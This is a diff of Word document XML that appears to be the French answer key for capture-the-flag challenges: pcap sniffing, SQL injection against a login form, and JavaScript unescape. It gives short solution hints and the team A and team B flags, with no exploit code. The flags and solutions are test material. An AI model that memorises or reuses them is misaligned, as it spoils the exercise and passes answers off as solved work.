-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="3114317"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Solution :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Télécharger le fichier .</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>pcap</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> et l’ouvrir avec Wireshark. Le mot de passe apparait en clair dans les trames échangées </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team A :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> cdts3500</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Flag team B :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> cdts3600</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="1065"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="21"/>
-        </w:numPr>
-        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br w:type="page"/>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:left="1062" w:firstLine="3"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
-        <w:t>Nom de la faille</w:t>
-      </w:r>
-      <w:r>
-        <w:t> : Injection SQL – http-018</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Catégorie </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: http</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Objectif </w:t>
-      </w:r>
-      <w:r>
-        <w:t>: récupérer le mot de passe administrateur enregistré dans la base</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="Titre2Car"/>
-        </w:rPr>
-        <w:t>Description :</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe administrateur du site enregistré dans une base SQL. Il dispose d’une page formulaire où il peut réaliser des injections SQL.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Titre2"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:t xml:space="preserve">Capture d’écran : </w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB31EC6" wp14:editId="24B065C7">
-            <wp:extent cx="5760720" cy="1443548"/>
-            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
-            <wp:docPr id="27" name="Image 27"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="0" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId24"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="1443548"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Paragraphedeliste"/>
-        <w:ind w:left="1065"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:noProof/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:drawing>
-          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3255FC98" wp14:editId="27C82AA9">
-            <wp:extent cx="4648200" cy="1647825"/>
-            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
-            <wp:docPr id="28" name="Image 28"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
             </wp:cNvGraphicFramePr>
@@ -10561,6 +10191,349 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1155084"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="528BB5D7" wp14:editId="54CBDF28">
+            <wp:extent cx="5760720" cy="3114317"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="26" name="Image 26"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId26"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="3114317"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="39" w:name="_Toc509996628"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Solution :</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="39"/>
+      <w:r>
+        <w:t xml:space="preserve"> Télécharger le fichier .pcap et l’ouvrir avec Wireshark. Le mot de passe apparait en clair dans les trames échangées </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="40" w:name="_Toc509996629"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team A :</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="40"/>
+      <w:r>
+        <w:t xml:space="preserve"> cdts3500</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="41" w:name="_Toc509996630"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Flag team B :</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="41"/>
+      <w:r>
+        <w:t xml:space="preserve"> cdts3600</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="1065"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="4F81BD"/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="21"/>
+        </w:numPr>
+        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="1062" w:firstLine="3"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="42" w:name="_Toc509996631"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>Nom de la faille</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="42"/>
+      <w:r>
+        <w:t> : Injection SQL – http-018</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="43" w:name="_Toc509996632"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Catégorie</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="43"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: http</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="44" w:name="_Toc509996633"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Objectif</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="44"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>: récupérer le mot de passe administrateur enregistré dans la base</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="45" w:name="_Toc509996634"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Titre2Car"/>
+        </w:rPr>
+        <w:t>Description :</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="45"/>
+      <w:r>
+        <w:t xml:space="preserve"> Le challenger doit retrouver le mot de passe administrateur du site enregistré dans une base SQL. Il dispose d’une page formulaire où il peut réaliser des injections SQL.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Titre2"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="46" w:name="_Toc509996635"/>
+      <w:r>
+        <w:t>Capture d’écran :</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="46"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5AB31EC6" wp14:editId="24B065C7">
+            <wp:extent cx="5760720" cy="1443548"/>
+            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
+            <wp:docPr id="27" name="Image 27"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId27"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5760720" cy="1443548"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Paragraphedeliste"/>
+        <w:ind w:left="1065"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3255FC98" wp14:editId="27C82AA9">
+            <wp:extent cx="4648200" cy="1647825"/>
+            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
+            <wp:docPr id="28" name="Image 28"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId28"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
                       <a:ext cx="4648200" cy="1647825"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
@@ -10585,12 +10558,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="47" w:name="_Toc509996636"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Solution :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="47"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
@@ -10606,12 +10581,14 @@
         <w:pStyle w:val="Paragraphedeliste"/>
         <w:ind w:left="1065"/>
       </w:pPr>
+      <w:bookmarkStart w:id="48" w:name="_Toc509996637"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team A :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="48"/>
       <w:r>
         <w:t xml:space="preserve"> 4dm1n1str@tor</w:t>
       </w:r>
@@ -10629,12 +10606,14 @@
           <w:lang w:eastAsia="fr-FR"/>
         </w:rPr>
       </w:pPr>
+      <w:bookmarkStart w:id="49" w:name="_Toc509996638"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="Titre2Car"/>
         </w:rPr>
         <w:t>Flag team B :</w:t>
       </w:r>
+      <w:bookmarkEnd w:id="49"/>
       <w:r>
         <w:t xml:space="preserve"> @dm1n1str4tor</w:t>
       </w:r>
@@ -10779,25 +10758,14 @@
         </w:rPr>
         <w:t xml:space="preserve">Objectif de la faille : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Unescape</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> JS</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t>Unescape JS</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10858,25 +10826,14 @@
         </w:rPr>
         <w:t xml:space="preserve">Description de la faille : </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>Unescape</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> mot de passe </w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+          <w:lang w:eastAsia="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Unescape mot de passe </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -10932,1434 +10889,6 @@
             <wp:extent cx="5760720" cy="739140"/>
             <wp:effectExtent l="0" t="0" r="0" b="3810"/>
             <wp:docPr id="16" name="Image 16"/>
-            <wp:cNvGraphicFramePr>
-              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
-            </wp:cNvGraphicFramePr>
-            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                  <pic:nvPicPr>
-                    <pic:cNvPr id="1" name=""/>
-                    <pic:cNvPicPr/>
-                  </pic:nvPicPr>
-                  <pic:blipFill>
-                    <a:blip r:embed="rId26"/>
-                    <a:stretch>
-                      <a:fillRect/>
-                    </a:stretch>
-                  </pic:blipFill>
-                  <pic:spPr>
-                    <a:xfrm>
-                      <a:off x="0" y="0"/>
-                      <a:ext cx="5760720" cy="739140"/>
-                    </a:xfrm>
-                    <a:prstGeom prst="rect">
-                      <a:avLst/>
-                    </a:prstGeom>
-                  </pic:spPr>
-                </pic:pic>
-              </a:graphicData>
-            </a:graphic>
-          </wp:inline>
-        </w:drawing>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Solution : </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Utiliser la fonction </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>unescape</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> sur la variable </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>pass</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> et utiliser la fonction String </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t>fro</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:t> ; char code encapsulée à l’intérieur.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
-        <w:br/>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:color w:val="4F81BD"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-          <w:lang w:eastAsia="fr-FR"/>
-        </w:rPr>
